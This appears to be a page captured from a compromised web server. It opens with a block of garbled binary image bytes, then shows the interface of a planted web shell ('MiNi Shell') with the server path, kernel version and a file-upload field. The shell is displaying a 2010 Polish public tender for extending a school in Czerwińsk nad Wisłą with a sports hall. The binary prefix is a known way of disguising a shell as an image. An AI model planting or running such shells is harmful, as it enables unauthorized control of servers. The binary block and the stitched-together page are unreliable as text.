JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100831/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100831/236695-N-2010.html

<p class="kh_header"><b>Czerwińsk nad Wisłą: Rozbudowa i modernizacja Gminnego Zespołu Szkół w Czerwińsku nad Wisłą
o halę sportową wraz z zespołem towarzyszącym</b><br>
<b>Numer ogłoszenia: 236695 - 2010; data zamieszczenia: 31.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Czerwińsk nad Wisłą , ul. Wł. Jagiełły 16, 09-150 Czerwińsk nad Wisłą, woj. mazowieckie, tel. 024 2315075, faks 024 2315199.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://ugczerwinsk.bip.org.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa i modernizacja Gminnego Zespołu Szkół w Czerwińsku nad Wisłą
o halę sportową wraz z zespołem towarzyszącym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> III.	Opis przedmiotu zamówienia:

3.1. Nazwy i kody określone we Wspólnym Słowniku Zamówień 
Kod Wspólnego Słownika Zamówień (CPV): 
45212222-8	Sale gimnastyczne
45111200-0	Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne
45110000-1	Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne
45111000-8	Roboty w zakresie burzenia, roboty ziemne
45223500-1	Konstrukcje z betonu zbrojonego
45262310-7	Zbrojenie
45320000-6	Roboty izolacyjne
45223110-0	Instalowanie konstrukcji metalowych
45262522-6	Roboty murarskie
45261100-5	Wykonywanie konstrukcji dachowych
45261210-9	Wykonywanie pokryć dachowych
45112713-6	Roboty w zakresie kształtowania ogródków dachowych
45262500-6	Roboty murarskie
45421100-5	Instalowanie drzwi i okien i podobnych elementów
45432100-5	Kładzenie i wykładanie podłóg
45410000-4	Tynkowanie
45442100-8	Roboty malarskie
45324000-4	Tynkowanie
45331210-1	Instalowanie wentylacji
45331100-7	Instalowanie centralnego ogrzewania
45262650-2	Okładziny
45400000-1	Roboty wykończeniowe w zakresie obiektów budowlanych
45453000-7	Roboty remontowe i renowacyjne
45310000-3	Roboty instalacyjne elektryczne
45330000-9	Hydraulika i roboty sanitarne
45321000-3	Izolacja cieplna
45332400-7	Roboty instalacyjne w zakresie sprzętu sanitarnego
45454000-4	Roboty restrukturyzacyjne
45332200-5	Hydraulika
45231300-8	Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków
3.2. Przedmiotem zamówienia jest rozbudowa i modernizacja  Gminnego Zespołu Szkół w Czerwińsku nad Wisłą w ramach realizacji projektu pn: Rozbudowa i modernizacja Gminnego Zespołu Szkół w Czerwińsku nad Wisłą o halę sportową  wraz z zespołem towarzyszącym
3.3. Zakres inwestycji obejmuje rozbudowę  i modernizację Gminnego Zespołu Szkół w Czerwińsku nad Wisłą. Przedmiotowa hala sportowa zaprojektowana została w konstrukcji żelbetowej, monolitycznej oraz tradycyjnej murowanej. Konstrukcję nośną zaplecza hali sportowej zaprojektowano w konstrukcji żelbetowej w systemie płytowo słupowym. 
Poszczególne elementy obiektu wykonano z użyciem następujących materiałów:
- ławy i stropy fundamentowe; wylewane żelbetowe,
- ściany fundamentowe; z bloczków betonowych grubości 36, ocieplone styropianem,
- ściany nośne zewnętrzne: 
- w hali rdzenie wylewane żelbetowe 38x38 cm, wypełnienie: gazobeton gr. 38 cm, styropian grubości 10 cm, tynk na siatce. 
- w pozostałej części: rdzenie wylewane żelbetowe 30 x 24 cm, wypełnienie: gazobeton grubości 24 cm, styropian grubości 10 cm, tynk na siatce. 
- ściany nośne wewnętrzne; cegła kratówka lub pełna grubości 25 cm. 
- ściany działowe; gazobeton grubości 12 i 24 cm, w pomieszczeniach mokrych: cegła dziurawka grubości 12 cm. 
- słupy konstrukcyjne; wylewane  żelbetowe, w hali 40 x 50 cm (wypełnienie ściany: gazobeton 24 i 38 cm), pozostała część 30 x 30 cm.
- stropy; wylewane żelbetowe grubości 20.
- dach nad salą sportową - belki z drewna klejonego 20 x 100 do 150 w rozstawie co 4,70 m i płatwie z drewna klejonego co 2,70 m, blacha trapezowa, wełna mineralna twarda, papa termozgrzewalna,
- dach nad zapleczem hali - belki z drewna klejonego 15 x 45 cm w rozstawie co 4,70 m, blacha trapezowa, wełna mineralna twarda, papa termozgrzewalna,
- dach nad częścią edukacyjną - strop wylewany żelbetowy gr. 20 cm, dach drewniany krokwiowy jednosłupowy, kryty blachodachówką (poddasze nieużytkowe),
- schody wewnętrzne - żelbetowe, płytowe, wylewane na mokro,
- schody zewnętrzne - wylewane żelbetowe lub z elementów prefabrykowanych,
- wieńce - wylewane żelbetowe, łączone z belkami nadprożowymi,
- nadproża - wylewane żelbetowe lub z elementów prefabrykowanych,
- kominy - murowane (przebudowa istniejącego komina w kotłowni), nowe kanały grawitacyjne z kształtek ceramicznych 20 x 20 cm (O wewn. 15 cm), stawiane na stropie, rozprowadzane do kratek Spiro pod sufitem podwieszanym z płyt gki na ruszcie stalowym 60 x 60 cm, wspomagane mechanicznie,
- stolarka okienna - PCV lub aluminium,
- izolacje: 
- przeciwwilgociowe - papa lub folia budowlana,
- wiatrowa - folia budowlana,
- termiczna - styropian lub wełna mineralna, 
- akustyczna - płyty Ecophon,
- podłogi i posadzki:
- w hali - klepka z twardego drewna klonowego na ruszcie z legarów z drewna iglastego, na podwójnych podkładkach elastycznych,
- w pozostałej części - posadzka na gruncie, wykończenie - terakota lub posadzka betonowa (w pomieszczeniu węzła cieplnego i wentylatorni),
- posadzki na stropie - parkiet drewniany klejony do podłoża (w salach sportowych na piętrze) lub terakota.

Zmiany wynikające z zamiennego projektu budowlanego:
Konstrukcja przekrycia hali sportowej oraz zespołu towarzyszącego.
Szczegółowe zmiany polegają na:
- zmianie kształtu dźwigarów w hali sportowej w celu umożliwienia ukształtowania dachu dwuspadowego o kącie nachylenia połaci wynoszącym ponad 3 stopnie., tj. 6% (w miejsce wcześniej zaprojektowanego dachu jednospadowego o kącie nachylenia połaci wynoszącym niecałe 3 stopnie, tj. 4,5%),
- zmianie kąta nachylenia połaci dachu nad zespołem towarzyszącym w celu uzyskania spadku wynoszącego 2 stopnie, tj. 4% (w miejsce wcześniej zaprojektowanego dachu jednospadowego o kącie nachylenia połaci wynoszącym 1 stopień, tj. 2%).
Wprowadzenie wyżej opisanych zmian pociągnęło za sobą konieczność przeprojektowania wielu wcześniej przyjętych rozwiązań projektowych, jak np.:
- konieczność ponownego przeliczenia konstrukcji dachów i zmiana wymiarów głównych elementów konstrukcyjnych (wysokość słupów, wymiary dźwigarów, belek i płatwi) oraz ich rozmieszczenia (patrz: rzut dachu, rzut sufitów podwieszonych, przekroje), 
- zmiana elewacji (okapy w miejscu wcześniej projektowanych attyk),
- zmiana pewnych odcinków instalacji wentylacji mechanicznej (szczegółowe rozwiązania wg projektów branżowych), 
- projektowana konstrukcja wsporcza z elementów stalowych na dachu  hali sportowej pod projektowaną czerpnię wentylacji mechanicznej,
- zmiana pewnych odcinków instalacji elektrycznej (ewentualna zmiana wysokości montażu opraw oświetleniowych) oraz zmiana instalacji odgromowej (szczegółowe rozwiązania wg projektów branżowych),
- zmiana podziału sufitów podwieszonych wynikająca ze zmiany rozmieszczenia płatwi,
- zmiana wysokości zamocowania do spodu nowych (przeprojektowanych) dźwigarów z drewna klejonego w hali sportowej projektowanych urządzeń wyposażenia hali sportowej (tj. tablic do koszykówki wraz z oprzyrządowaniem - konstrukcja podwieszana z napędem elektrycznym).

Budynek będzie wyposażony w następujące instalacje: elektryczną, odgromową, wodociągową, kanalizacyjną, c.o.

Zestawienie istniejącej i projektowanej powierzchni obiektu edukacyjno-sportowego:


powierzchnia terenu szkoły objętego opracowaniem	31497,00 m2
powierzchnia zabudowy	istniejącego budynku szkoły	    1609,36 m2
	projektowana rozbudowa	  2021,60 m2
powierzchnia użytkowa	istniejąca 	  2118,83 m2
	uzyskana po rozbudowie 	  4252,66 m2
kubatura	istniejąca	15060,00 m3
	projektowana	18500,00 m3
wysokość	istniejąca	najwyższego punktu kalenicy	15,30 m
		kalenicy nad salą gimnastyczną	10,51 m
		płaskiego dachu w części II-kond.	7,39 m
		płaskiego dachu w części I-kond.	4,92 m
	projektowana	hali sportowej	10,32 m
		kalenicy nad cz. edukacyjną	10,51 m
		zaplecza hali sportowej	7,91 m

Szczegółowy opis i zakres zamówienia określa kompleksowa dokumentacja projektowa tj. : 
A) PROJEKT BUDOWLANY PRZEBUDOWY I ROZBUDOWY GMINNEGO ZESPOŁU SZKÓŁ W CZERWIŃSKU N. WISŁĄ O HALĘ SPORTOWĄ WRAZ Z ZESPOŁEM TOWARZYSZĄCYM: 
1) TOM I ARCHITEKTURA: 
- Część 1  Inwentaryzacja stanu istniejącego,
- Część 2 Projekt zagospodarowania przestrzennego,
- Część 3 Projekt architektoniczno-budowlany.
2) TOM II KONSTRUKCJE
- Część 1 Schematy konstrukcyjne,
- Część 2 Obliczenia statyczne.
3) TOM III INSTALACJE
- Część 1 Instalacja wodno-kanalizacyjna,
- Część 2 Instalacja centralnego ogrzewania,
- Część 3 Instalacja wentylacji mechanicznej,
- Część 4 Instalacje elektryczne.  
B) PROJEKT BUDOWLANY  ZAMIENNY PRZEBUDOWY I ROZBUDOWY GMINNEGO ZESPOŁU SZKÓŁ W CZERWIŃSKU N. WISŁĄ O HALĘ SPORTOWĄ WRAZ Z ZESPOŁEM TOWARZYSZĄCYM:
- TOM I ARCHITEKTURA,
- TOM II KONSTRUKCJE,
- TOM III INSTALACJE. 
C) PROJEKT WYKONAWCZY PRZEBUDOWY I ROZBUDOWY GMINNEGO ZESPOŁU SZKÓŁ W CZERWIŃSKU N. WISŁĄ O HALĘ SPORTOWĄ WRAZ Z ZESPOŁEM TOWARZYSZĄCYM:
1) TOM I - ARCHITEKTURA
- Część 1 Projekt zagospodarowania terenu
- Część 2 Projekt architektoniczny
2) TOM II - KONSTRUKCJE
3) TOM III - INSTALACJE
- Część 1 Instalacja wodno-kanalizacyjna
- Część 2 Instalacja centralnego ogrzewania
- Część 3 Instalacja wentylacji mechanicznej
- Część 4 Instalacja elektryczna
D) Dokumentacja geotechniczna pod projektowaną przebudowę i rozbudowę Gminnego Zespołu Szkół w Czerwińsku n. Wisłą przy ul. Warszawskiej 1, 
E) Specyfikacje techniczne wykonania i odbioru robót budowlanych rozbudowy Gminnego Zespołu Szkół w Czerwińsku n. Wisłą o halę sportową wraz z zespołem towarzyszącym,
F) Ekspertyza techniczna  dotycząca stanu technicznego części budynku Zespołu Szkół pod kątem jej modernizacji i budowy hali sportowej w bezpośrednim sąsiedztwie w Czerwińsku przy ul. Warszawskiej
G) przedmiary robót:
- przedmiar robót - roboty budowlane,
- przedmiar robót - instalacja wod.-kan. i kanalizacja zewnętrzna,
- przedmiar robót - instalacja wentylacji (sali gimnastycznej i zaplecza),
- przedmiar robót - kotłownia,
- przedmiar robót - instalacja c.o.,
- przedmiar robót - węzeł cieplny,
- przedmiar robót - instalacja elektryczna.
H) kosztorysy ofertowe:
- kosztorys ofertowy - roboty budowlane,
- kosztorys ofertowy - instalacja wod.-kan. i kanalizacja zewnętrzna,
- kosztorys ofertowy - wentylacja sali gimnastycznej i zaplecza,
- kosztorys ofertowy - kotłownia,
- kosztorys ofertowy - instalacja c.o.,
- kosztorys ofertowy - węzeł cieplny,
- kosztorys ofertowy - instalacja elektryczna.

Przedmiot zamówienia podzielono do realizacji na trzy etapy:

I etap - zakończenie realizacji I etapu do 30 listopada 2010 roku
II etap - zakończenie realizacji II etapu do 30 listopada 2011 roku
III etap - zakończenie realizacji do 31 października 2012 roku.

Rok 2010

a) I etap obejmuje wykonanie następujących elementów prac: 
    zakończenie realizacji I etapu do 30 listopada 2010 roku
1. Roboty budowlano-montażowe 

Lp. 	Wyszczególnienie rodzaju robót 
1. 	Przygotowanie terenu i roboty rozbiórkowe zewnętrzne (bez opłat za wycinkę drzew) 
2. 	Roboty rozbiórkowe wewnętrzne i uzupełniające 
3.	Roboty ziemne 
4. 	Ławy fundamentowe 
5.	Stopy fundamentowe 
6. 	Zbrojenie ław i stóp fundamentowych 
7. 	Izolacje p-w i cieplne ław i stóp fundamentowych 
8. 	Ściana oporowa przy wejściu do kotłowni  
9. 	Płyty PZ-1, PZ-2, DW-1 
10.	Podciągi P1, P2,P2bis,P3,P4,P5,P6 
11. 	Słupy i rdzenie żelbetowe  
12.	Płyty stropowe i wieńce - parter
13.	Płyty stropowe i wieńce - piętro   
14.	Wieńce W1, W1A, W1B 
15.	Płyty widowni  
16.	Nadproża N4.7,N1.6,N16a,N15,N1.1,N1.8,N3.1  
17.	Podciągi, słupy stalowe, tężniki pionowe i poziome 
18. 	Schody SchW-3   
19. 	Schody SchW-1 
20.	Schody SCH1 szt.2   
21. 	Schody SchW-2  
22.	Ściany i ścianki działowe  
23.	Konstrukcja z drewna klejonego 
24.	Stropodach nad salą sportową 
25.	Stropodach nad zespołem towarzyszącym 
26.	Konstrukcja drewniana dachu  
27.	Pokrycie dachu nad poddaszem nieużytkowym  
28. 	Kominy 

Rok 2011

b) II etap obejmuje wykonanie następujących elementów prac: 
    zakończenie realizacji II etapu do 30 listopada 2011 roku
1. Roboty budowlano-montażowe 

I. Realizacja od 02.01.2011r. do 31.03.2011 r. 
  1. Roboty budowlano-montażowe 

Lp. 	Wyszczególnienie rodzaju robót 
1. 	Ścianki wewnętrzne aluminiowe 
2.	Tynki i okładziny wewnętrzne    

II. Realizacja  od 01.04.2011r. do 30.06.2011 r. 
  1. Prace instalacyjne 

1.	Instalacja wod.kan. część istniejąca 
2.	Instalacja wod.kan. część projektowana   
3.	Zewnętrzna kanalizacja sanitarna  
4.	Instalacja wentylacji sali gimnastycznej 
5.	Instalacja wentylacji zaplecza  



III. Realizacja  od 01.07.2011 r. do 30.11.2011 r. 
  1. Roboty budowlano-montażowe  i prace instalacyjne

Lp. 	Wyszczególnienie rodzaju robót 
1.	Kotłownia  
2.	Instalacja c.o. część starej szkoły 
3. 	Instalacja c.o. część nowa szkoły
4. 	Węzeł cieplny 
5.	Instalacje elektryczne 
6.	Roboty remontowe w kotłowni 
7.	Posadzki 
8. 	Stolarka okienna i parapety wewnętrzne 
9.	Drzwi wewnętrzne i zewnętrzne 
10.	Obróbki blacharskie 

Rok 2012


c) III etap obejmuje wykonanie następujących elementów prac: 
    zakończenie realizacji III etapu do 30 października  2012 roku

I. Realizacja  od 02. 01. 2012 r. do 30.06. 2012 r. 
  1. Roboty budowlano-montażowe 

11. 	Ścianki szklane zewnętrzne aluminiowe systemowe 
12. 	Roboty malarskie  
13.	Elewacja rozbudowy i części przebudowywanej     
14. 	Okładziny zewnętrzne i wycieraczki  
15.	Balustrady  


II. Realizacja  od 01. 07. 2012r. do 31.10. 2012 r. 
  1. Wyposażenie  

1. 	Wyposażenie  
1.1. 	Wyposażenie hali sportowej  
1.2.	Wyposażenie przebieralni     
1.3. 	Wyposażenie  siłowni    
1.4.	Pozostały sprzęt gimnastyczny
1.5.	Wyposażenie sali ćwiczeń korekcyjnych
1.6.	Pozostałe wyposażenie obiektu
            
Wymagany okres gwarancji na wykonany przedmiot zamówienia wynosi 60 miesięcy od dnia odebrania przez Zamawiającego robót budowlanych i podpisania (bez uwag) protokołu końcowego.
                                                                                                         
3.4. Wykonawcy zaleca się odwiedzenie i sprawdzenie miejsca robót oraz jego otoczenia w celu oceny, na własną odpowiedzialność, koszt i ryzyko, czynników koniecznych do przygotowania jego oferty i podpisania umowy na roboty. Wizyta na placu budowy nie będzie organizowana przez Zamawiającego. 
3.5. Zamawiający dopuszcza ujęcie w ofercie, a następnie zastosowanie innych materiałów i urządzeń niż podane w dokumentacji projektowej pod warunkiem zapewnienia parametrów nie gorszych niż określone w tej dokumentacji. W takiej sytuacji Zamawiający wymaga złożenia stosownych dokumentów, uwiarygodniających te materiały i urządzenia. W przypadku, gdy zastosowanie tych materiałów lub urządzeń wymagać będzie zmiany dokumentacji projektowej koszty przeprojektowania poniesie Wykonawca.
 
Wykonawca na własny koszt, na czas prowadzenia prac zobowiązany jest ponadto do:
1. zabezpieczenia terenu budowy z zachowaniem najwyższej staranności;
2. zawiadomienia Zamawiającego o zamiarze wykonania robót zanikających lub ulegających zakryciu z wyprzedzeniem ustalonym z inspektorem nadzoru;
3. przerwania robót  na żądanie Zamawiającego oraz zabezpieczenie wykonania robót przed ich zniszczeniem;
4. zgłoszenia przedmiotu umowy do odbiorów częściowych i do odbioru końcowego, uczestnictwa w czynnościach odbioru  i zapewnienie  usunięcia stwierdzonych wad;
5. dbania o należyty porządek na terenie budowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych  (t.j. Dz. U. z 2010 nr 113, poz. 759).</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.22-8, 45.11.12.00-0, 45.11.00.00-1, 45.11.10.00-8, 45.22.35.00-1, 45.26.23.10-7, 45.32.00.00-6, 45.22.31.10-0, 45.26.25.22-6, 45.26.11.00-5, 45.26.12.10-9, 45.11.27.13-6, 45.26.25.00-6, 45.42.11.00-5, 45.43.21.00-5, 45.41.00.00-4, 45.44.51.00-8, 45.32.40.00-4, 45.33.12.10-1, 45.33.11.00-7, 45.26.26.50-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość wadium

Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium w wysokości: 170 000,00  zł (słownie: sto siedemdziesiąt tysięcy złotych 00/100).

9.2. Forma wadium.

Wadium może być wniesione w:
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
c)	gwarancjach bankowych, 
d)	gwarancjach ubezpieczeniowych, 
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm). 

9.3. Termin i miejsce wniesienia wadium.
a)	Wadium  należy wnieść przed upływem terminu składania ofert.  
b)	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego: 
Nadwiślański Bank Spółdzielczy w Czerwińsku nad Wisłą
Nr rachunku bankowego: 70 9011 0005 0260 0459 2000 0020
Kserokopię dowodu wpłaty należy dołączyć do oferty. Na dowodzie wpłaty należy określić nazwę postępowania, na które wnoszone jest wadium.

c) Wadium wnoszone  w pozostałych dopuszczalnych formach należy dołączyć do oferty w postaci oryginału dokumentu (w celu możliwości jego zwrotu)  oraz kserokopii dokumentu potwierdzonej za zgodność z oryginałem.
d) Nie wniesienie wadium w wymaganym terminie, wymaganej wysokości i formie, skutkuje wykluczeniem Wykonawcy z postępowania.
e)  Wadium wnoszone w formie gwarancji winno zawierać w swej treści:
- nieodwołalne i bezwarunkowe zobowiązanie się do zapłaty na rzecz Zamawiającego kwoty wadium na wypadek, gdyby:	
- Wykonawca odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
- nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
- jeżeli w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3 nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Prawo Zamówień Publicznych lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
- dokładne określenie nazwy postępowania, na które wnoszone jest wadium,
- kwotę zobowiązania,
- termin ważności,
f) Wadium wniesione przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia musi być wystawione na wszystkich Wykonawców składających ofertę wspólnie</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie przedłożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w art.22 ust 1 ustawy Prawo Zamówień Publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca zobowiązany jest   wykazać, że w okresie ostatnich pięciu  lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, wykonał zgodnie     z zasadami sztuki budowlanej i prawidłowo ukończył  co najmniej trzy roboty budowlane polegające na budowie lub przebudowie obiektów kubaturowych użyteczności publicznej  o wartości nie mniejszej niż  5 000 000,00  PLN  brutto łącznie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca zobowiązany jest wykazać, że dysponuje osobami posiadającymi uprawnienia, których obowiązek posiadania  nakłada ustawa Prawo budowlane do:
a) kierowania robotami budowlanymi w specjalnościach :
- konstrukcyjno - budowlanej, 
- instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych, 
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca zobowiązany jest wykazać, że dysponuje osobami posiadającymi uprawnienia, których obowiązek posiadania  nakłada ustawa Prawo budowlane do:
a) kierowania robotami budowlanymi w specjalnościach :
- konstrukcyjno - budowlanej
- instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych, 
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
